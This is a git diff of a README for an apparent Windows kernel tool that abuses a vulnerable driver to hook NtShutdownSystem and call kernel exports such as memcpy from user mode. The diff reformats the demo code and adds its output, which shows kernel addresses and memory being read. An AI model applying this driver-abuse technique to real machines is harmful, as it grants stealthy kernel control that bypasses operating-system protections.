diff --git a/README.md b/README.md index 7967ec2..2d684f7 100644 --- a/README.md +++ b/README.md @@ -14,26 +14,40 @@ but is removed after every syscall into NtShutdownSystem to prevent possible det In this example VDM syscalls into an inline hook placed on NtShutdownSystem to call memcpy exported from ntoskrnl.exe. +#### Demo Code ```cpp - vdm::vdm_ctx vdm; - const auto ntoskrnl_base = - reinterpret_cast( - util::get_module_base("ntoskrnl.exe")); - - const auto ntoskrnl_memcpy = - util::get_kernel_export("ntoskrnl.exe", "memcpy"); - - std::printf("[+] drv_handle -> 0x%x, drv_key -> %s\n", drv_handle, drv_key.c_str()); - std::printf("[+] %s physical address -> 0x%p\n", vdm::syscall_hook.first, vdm::syscall_address.load()); - std::printf("[+] ntoskrnl base address -> 0x%p\n", ntoskrnl_base); - std::printf("[+] ntoskrnl memcpy address -> 0x%p\n", ntoskrnl_memcpy); - - short mz_bytes = 0; - vdm.syscall(ntoskrnl_memcpy, &mz_bytes, ntoskrnl_base, sizeof mz_bytes); - std::printf("[+] kernel MZ -> 0x%x\n", mz_bytes); +vdm::vdm_ctx vdm; +const auto ntoskrnl_base = +reinterpret_cast( + util::get_module_base("ntoskrnl.exe")); + +const auto ntoskrnl_memcpy = +util::get_kernel_export("ntoskrnl.exe", "memcpy"); + +std::printf("[+] drv_handle -> 0x%x, drv_key -> %s\n", drv_handle, drv_key.c_str()); +std::printf("[+] %s physical address -> 0x%p\n", vdm::syscall_hook.first, vdm::syscall_address.load()); +std::printf("[+] ntoskrnl base address -> 0x%p\n", ntoskrnl_base); +std::printf("[+] ntoskrnl memcpy address -> 0x%p\n", ntoskrnl_memcpy); + +short mz_bytes = 0; +vdm.syscall( + ntoskrnl_memcpy, + &mz_bytes, + ntoskrnl_base, + sizeof mz_bytes +); +std::printf("[+] kernel MZ -> 0x%x\n", mz_bytes); ``` - +#### Demo Code Result +``` +[+] drv_handle -> 0x70, drv_key -> frAQBc8Wsa1xVPfv +[+] NtShutdownSystem physical address -> 0x00000000109BB3A0 +[+] ntoskrnl base address -> 0xFFFFF80075200000 +[+] ntoskrnl memcpy address -> 0xFFFFF800755F0980 +[+] kernel MZ -> 0x5a4d +[+] press any key to close... +``` # Usage